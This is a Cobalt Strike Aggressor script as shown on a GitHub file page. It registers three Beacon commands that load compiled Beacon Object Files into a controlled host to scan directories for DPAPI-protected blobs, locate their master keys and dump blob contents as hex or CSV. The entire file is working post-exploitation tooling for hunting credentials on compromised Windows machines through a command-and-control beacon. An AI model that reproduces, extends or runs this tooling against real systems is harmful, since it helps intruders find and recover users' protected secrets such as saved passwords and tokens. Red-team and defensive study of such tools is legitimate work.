-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathdpapi-bof.cna
More file actions
179 lines (145 loc) · 5.59 KB
/
dpapi-bof.cna
File metadata and controls
179 lines (145 loc) · 5.59 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
# Register the command in the Beacon console
beacon_command_register(
"dpapi_scan",
"Scans a directory for DPAPI blobs and locates associated Master Keys, with the option to dump hex-formatted bytes or output data in CSV format.",
"Usage: dpapi_scan /path:C:\\path\\to\\folder\\* [/dump:true|false] [/csv:true|false]"
);
beacon_command_register(
"dpapi_scan_light",
"Scans a directory for DPAPI blobs and locates associated Master Keys. No frills.",
"Usage: dpapi_scan_light /path:C:\\path\\to\\folder\\*"
);
beacon_command_register(
"dpapi_describe",
"Parses a specific DPAPI blob and dumps all structure fields, with the option to dump hex-formatted bytes.",
"Usage: dpapi_describe /path:C:\\path\\to\\file [/dump:true|false]"
);
alias dpapi_scan {
local('$bid $path_val $dump_val $dump_opt $csv_val $csv_opt $key $val $args $data $handle');
# $1 is the Beacon ID
$bid = $1;
# Initialize defaults
$path_val = $null;
$dump_val = $null;
$dump_opt = 0;
$csv_val = $null;
$csv_opt = 0;
# Parse through arguments using split(), abandoned regex due to inconsistent results
for($i = 1; $i < size(@_); $i++) {
$arg = @_[$i];
# Split the argument by the first colon only
$parts = split(':', $arg, 2);
# Check if we have both a key and a value
if (size($parts) == 2) {
$key = $parts[0];
$val = $parts[1];
#blog2($bid, $key);
# Compare keys
if ($key eq "/path") {
$path_val = $val;
}
else if ($key eq "/dump") {
$dump_val = $val;
}
else if ($key eq "/csv") {
$csv_val = $val;
}
}
}
if ($path_val is $null) {
berror($bid, "Please specify a path. Example: dpapi_scan /path:C:\\path\\to\\folder\\* [/dump:true|false] [/csv:true|false]");
return;
}
if (lc($dump_val) eq "true") { $dump_opt = 1; }
if (lc($csv_val) eq "true") { $csv_opt = 1; }
# Read the compiled BOF file
# Ensure dpapi-bof-scan.o is in the same directory as this script
$handle = openf(script_resource("dpapi-bof-scan.o"));
$data = readb($handle, -1);
closef($handle);
# Pack the arguments using the 'z' format (null-terminated string), i (integer), i (integer)
$args = bof_pack($bid, "zii", $path_val, $dump_opt, $csv_opt);
# Log the action and execute
btask($bid, "Running DPAPI Scan with: $path_val");
beacon_inline_execute($bid, $data, "go", $args);
}
alias dpapi_scan_light {
local('$bid $path_val $key $val $args $data $handle');
# $1 is the Beacon ID
$bid = $1;
# Initialize defaults
$path_val = $null;
# Parse through arguments using split(), abandoned regex due to inconsistent results
for($i = 1; $i < size(@_); $i++) {
$arg = @_[$i];
# Split the argument by the first colon only
$parts = split(':', $arg, 2);
# Check if we have both a key and a value
if (size($parts) == 2) {
$key = $parts[0];
$val = $parts[1];
#blog2($bid, $key);
# Compare keys
if ($key eq "/path") {
$path_val = $val;
}
}
}
if ($path_val is $null) {
berror($bid, "Please specify a path. Example: dpapi_scan_light /path:C:\\path\\to\\folder\\*");
return;
}
# Read the compiled BOF file
# Ensure dpapi-bof-scan-light.o is in the same directory as this script
$handle = openf(script_resource("dpapi-bof-scan-light.o"));
$data = readb($handle, -1);
closef($handle);
# Pack the arguments using the 'z' format (null-terminated string)
$args = bof_pack($bid, "z", $path_val);
# Log the action and execute
btask($bid, "Running DPAPI Scan Light with: $path_val");
beacon_inline_execute($bid, $data, "go", $args);
}
alias dpapi_describe {
local('$bid $path_val $dump_val $dump_opt $key $val $args $data $handle');
# $1 is the Beacon ID
$bid = $1;
# Initialize defaults
$path_val = $null;
$dump_val = 0;
$dump_opt = 0;
# Parse through arguments using split(), abandoned regex due to inconsistent results
for($i = 1; $i < size(@_); $i++) {
$arg = @_[$i];
# Split the argument by the first colon only
$parts = split(':', $arg, 2);
# Check if we have both a key and a value
if (size($parts) == 2) {
$key = $parts[0];
$val = $parts[1];
#blog2($bid, $key);
# Compare keys
if ($key eq "/path") {
$path_val = $val;
}
else if ($key eq "/dump") {
$dump_val = $val;
}
}
}
if ($path_val is $null) {
berror($bid, "Please specify a path. Example: dpapi_describe /path:C:\\Users\\Name\\Desktop\\secret.out [/dump:true|false]");
return;
}
if (lc($dump_val) eq "true") { $dump_opt = 1; }
# Read the compiled BOF file
# Ensure dpapi-bof-describe.o is in the same directory as this script
$handle = openf(script_resource("dpapi-bof-describe.o"));
$data = readb($handle, -1);
closef($handle);
# Pack the arguments using the 'z' format (null-terminated string)
$args = bof_pack($bid, "zi", $path_val, $dump_opt);
# Log the action and execute
btask($bid, "Running DPAPI Describe with: $path_val");
beacon_inline_execute($bid, $data, "go", $args);
}